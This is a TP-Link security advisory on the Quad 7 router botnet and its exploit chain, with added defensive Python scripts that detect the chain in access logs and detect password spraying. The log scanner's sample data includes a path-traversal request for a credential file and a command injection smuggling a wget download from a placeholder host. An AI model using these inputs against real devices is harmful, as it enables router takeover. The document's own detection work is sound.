Technical News and Reports about Quad 7 (7777) Botnet aka CovertNetwork-1658

Security Advisory
Updated 02-11-2025 23:49:54

Microsoft has tracked a network of compromised Small Office / Home Office (SOHO) routers, predominantly TP-Link devices, as CovertNetwork-1658 (also called the Quad 7 (7777) botnet). This network has been used by Chinese threat actors for password spray attacks against Microsoft 365 accounts. The threat actor exploits vulnerabilities in the routers to gain remote code execution capability.

Sekoia.io monitored a TP-Link TL-WR841N router running firmware 3.16.9 Build 150320 Rel.57500n, a version known to be vulnerable to the chained exploit used by the Quad 7 botnet. Sekoia observed an attack that chained an unauthenticated file disclosure with a command injection. The file disclosure let the threat actor retrieve the username/password pair stored in /tmp/dropbear/dropbearpwd and replay it as the HTTP Basic authentication credentials of the management interface (NVD - CVE-2023-50224). Once authenticated, the attacker exploited a known command injection in the Parental Control page to achieve remote code execution (documented at https://openwrt.org/toh/tp-link/tl-mr22u_v1; no CVE had been assigned).

This exploit chain is reachable from the internet only when the end user has enabled remote administration on the WAN interface, which TP-Link firmware does not do by default. TP-Link recommends against exposing the remote administration interface to the internet as a matter of course.
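As an added illustration of what the chain above looks like from the defender's side (this is not TP-Link's or Sekoia's code), the following Python script scans access-log lines for its three stages: a request that reaches /tmp/dropbear/dropbearpwd, HTTP Basic authentication arriving from a non-LAN source, and shell metacharacters in the url_0 parameter of the Parental Control page. The log format is constructed; the paths /userRpm/ParentCtrlRpm.htm and /userRpm/LoginRpm.htm are assumed names; and because the request that triggers the file disclosure is not described in this advisory, only the disclosed file name is matched.

```python
"""Flag access-log requests matching the TP-Link exploit chain.

Added example, not TP-Link's or Sekoia's code. The log format is constructed
(source IP, timestamp, quoted request line, status, auth marker). The paths
/userRpm/ParentCtrlRpm.htm and /userRpm/LoginRpm.htm are assumed names. Only
/tmp/dropbear/dropbearpwd and the url_0 parameter come from the advisory; the
shape of the file-disclosure request does not, so only the file name is matched.
"""
import ipaddress
import re
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<ts>\S+) "(?P<method>[A-Z]+) (?P<target>\S+)" '
    r'(?P<status>\d{3}) (?P<auth>\S+)$'
)
# Characters that break out of a shell command if url_0 is interpolated unquoted.
SHELL_META = re.compile(r'[;|&$`<>()\n]')
# Addresses that may legitimately reach the management interface.
LAN_NETS = [ipaddress.ip_network(n) for n in
            ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
             "127.0.0.0/8", "169.254.0.0/16")]
CHAIN = {"file_disclosure", "wan_basic_auth", "cmd_injection"}


def is_external(ip):
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in LAN_NETS)


def classify(line):
    """Return {'ip', 'ts', 'stages'} for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m["target"]
    parts = urlsplit(target)
    path = unquote(parts.path)
    query = parse_qs(parts.query, keep_blank_values=True)  # decodes %XX in values
    stages = set()
    if "dropbearpwd" in unquote(target):
        stages.add("file_disclosure")
    if m["auth"] == "basic" and is_external(m["ip"]):
        stages.add("wan_basic_auth")
    if "parentctrl" in path.lower():
        if any(SHELL_META.search(v) for v in query.get("url_0", [])):
            stages.add("cmd_injection")
    return {"ip": m["ip"], "ts": m["ts"], "stages": stages}


def scan(lines):
    """All parsed lines that matched at least one stage."""
    return [r for r in map(classify, lines) if r and r["stages"]]


def chained_sources(hits):
    """Source IPs seen in all three stages, i.e. the full chain."""
    seen = {}
    for h in hits:
        seen.setdefault(h["ip"], set()).update(h["stages"])
    return sorted(ip for ip, s in seen.items() if CHAIN <= s)


# Constructed sample log; 203.0.113.7 runs the whole chain, the LAN admin and a
# random 401 from the internet do not.
SAMPLE_LOG = [
    '203.0.113.7 2024-09-09T10:00:01Z "GET /cgi-bin/../../tmp/dropbear/dropbearpwd" 200 -',
    '203.0.113.7 2024-09-09T10:00:05Z "GET /userRpm/LoginRpm.htm" 200 basic',
    '203.0.113.7 2024-09-09T10:00:09Z "GET /userRpm/ParentCtrlRpm.htm'
    '?url_0=evil.com%3Bwget%20http%3A%2F%2F203.0.113.7%2Fx" 200 basic',
    '192.168.0.12 2024-09-09T10:01:00Z "GET /userRpm/ParentCtrlRpm.htm?url_0=example.com" 200 basic',
    '198.51.100.4 2024-09-09T10:02:00Z "GET /index.htm" 401 -',
]

if __name__ == "__main__":
    hits = scan(SAMPLE_LOG)
    for h in hits:
        print(h["ts"], h["ip"], sorted(h["stages"]))
    print("full chain from:", chained_sources(hits))
```

The LAN administrator's benign url_0 and Basic auth produce no finding; the external source is flagged at every stage, which is the pattern worth alerting on even when the individual requests return 200.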

Discovery Timeline:

  • 10/19/2023
  • 07/23/2024
  • 09/09/2024
  • 10/31/2024: Microsoft published a blog post reporting intrusion activity that successfully targeted and stole credentials from multiple Microsoft customers, attributed to a threat actor associated with the Quad 7 botnet. Microsoft stated that the network of compromised devices used by the threat actor consisted mostly of TP-Link SOHO routers, and noted that use of the compromised devices had declined steeply since the network's activities were publicly reported.
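As an added example (not Microsoft's or TP-Link's detection logic), the following Python code shows why a password spray launched from a router botnet is hard to catch per source IP and how to catch it in aggregate instead. The sign-in records are constructed, and the thresholds (five accounts with at most two failures each in an hour) are assumed starting points, not values from this advisory.

```python
"""Password-spray detection over constructed Microsoft 365-style sign-in records.

Added example; not Microsoft's or TP-Link's detection logic. Thresholds are
assumed starting points for tuning, not values from the advisory.
"""
from collections import defaultdict
from datetime import datetime, timedelta

EPOCH = datetime(1970, 1, 1)

# Constructed records (timestamp, account, source IP, result); not real telemetry.
SIGNINS = [
    ("2024-10-31T08:00:05Z", "alice@example.com", "203.0.113.11",  "failure"),
    ("2024-10-31T08:03:41Z", "bob@example.com",   "198.51.100.23", "failure"),
    ("2024-10-31T08:07:12Z", "carol@example.com", "203.0.113.45",  "failure"),
    ("2024-10-31T08:11:50Z", "dave@example.com",  "198.51.100.77", "failure"),
    ("2024-10-31T08:15:03Z", "erin@example.com",  "203.0.113.90",  "failure"),
    ("2024-10-31T08:19:27Z", "frank@example.com", "198.51.100.8",  "failure"),
    ("2024-10-31T08:22:44Z", "grace@example.com", "203.0.113.3",   "success"),
] + [
    # Single-source brute force against one account: a different pattern.
    ("2024-10-31T09:%02d:00Z" % m, "heidi@example.com", "192.0.2.200", "failure")
    for m in range(6)
] + [
    # An ordinary mistyped password followed by a successful sign-in.
    ("2024-10-31T10:05:00Z", "ivan@example.com", "203.0.113.60", "failure"),
    ("2024-10-31T10:05:20Z", "ivan@example.com", "203.0.113.60", "success"),
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def spray_sources(records, min_accounts=5, max_per_account=2):
    """Per-source rule: IPs that failed against many distinct accounts, few tries each.
    A botnet that rotates through thousands of routers, one account per router,
    never trips this rule."""
    fails = defaultdict(lambda: defaultdict(int))
    for ts, user, ip, result in records:
        if result == "failure":
            fails[ip][user] += 1
    return sorted(ip for ip, users in fails.items()
                  if len(users) >= min_accounts
                  and max(users.values()) <= max_per_account)


def spray_windows(records, window=timedelta(hours=1),
                  min_accounts=5, max_per_account=2):
    """Aggregate rule: a time window in which many distinct accounts each saw only
    a few failures, spread over many source IPs. Returns one dict per flagged
    window, including accounts that signed in successfully inside it (the ones
    to review first, since a spray that worked looks like a normal sign-in)."""
    buckets = defaultdict(lambda: {"fails": defaultdict(int), "ips": set(), "ok": []})
    for ts, user, ip, result in records:
        b = buckets[(parse_ts(ts) - EPOCH) // window]   # integer window index
        if result == "failure":
            b["fails"][user] += 1
            b["ips"].add(ip)
        elif result == "success":
            b["ok"].append(user)
    flagged = []
    for key, b in sorted(buckets.items()):
        low = [u for u, n in b["fails"].items() if n <= max_per_account]
        if len(low) >= min_accounts:
            flagged.append({
                "window_start": EPOCH + key * window,
                "accounts": len(low),
                "sources": len(b["ips"]),
                "successes": sorted(b["ok"]),
            })
    return flagged


if __name__ == "__main__":
    print("per-source rule flags:", spray_sources(SIGNINS))
    for w in spray_windows(SIGNINS):
        print(w)
```

On the constructed data the per-source rule returns nothing, because every router in the botnet tried exactly one account, while the windowed rule flags the 08:00 hour (six accounts, six sources) and surfaces grace@example.com's success in that hour for review. The brute force against heidi@example.com is deliberately left to a separate rule: its failure count per account is high, which is the opposite shape.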

Related CVEs and Known Exploits

NVD - CVE-2023-50224 - According to Sekoia's analysis, the threat actor chained two vulnerabilities.

  • The first vulnerability, CVE-2023-50224, is an unauthenticated file disclosure that allows retrieval of the credentials stored in /tmp/dropbear/dropbearpwd. These credentials are then replayed as the HTTP Basic authentication credentials of the management interface. TP-Link has been tracking this vulnerability internally as TP-Link Vulnerability Disclosure (TPVD) 202321023 TL-WR841N. Patched firmware for the affected devices can be found here.
  • The second vulnerability is a known command injection in the Parental Control page: tampering with the url_0 parameter yields remote code execution. This vulnerability had not previously been reported to TP-Link and has no CVE. TP-Link is tracking it internally as TPVD202411095, and we are processing a corresponding CVE submission. Patched firmware for the affected devices can be found here.

Related Firmware and Router Models

Two router models and associated firmware versions are relevant to the discovery timeline:

  • TL-WR841N/ND(MS) 9.0, Firmware version: 3.16.9 Build 150320 Rel.57500n
  • Archer C7(EU) 2.0, Firmware version: 3.15.3 Build 180305 Rel.51282n

The firmware versions at issue are several revisions behind the latest firmware for these TP-Link SOHO routers. The identified routers are also at End of Life (EOL) status (see our EOL_List_Home.pdf and our TP-Link End-of-Life Policy). They have been replaced by new families of products with superior capabilities and security models; the replacement models are not affected by these vulnerabilities. TP-Link is tracking unconfirmed reports of other vulnerable router models and will provide updates upon further investigation.

How TP-Link is Responding

TP-Link is performing the following:
  • Despite the affected router models used in the Quad 7 botnet being past their EOL/EOS date, TP-Link has developed and released firmware patching the vulnerabilities used by the Storm-0940/Quad7 threat actor (linked above). We have engaged with the community to raise awareness on the availability of these updates.
  • We are engaging with security researchers to obtain additional samples of affected binaries and deployed adversarial payloads in order to perform additional analysis and development of additional Indicators of Compromise (IoC).
  • TP-Link and its security partners are actively monitoring public intelligence data on the Quad 7 botnet and similar emerging threats, and the company commits to taking speedy and appropriate action to protect its customers and their devices.
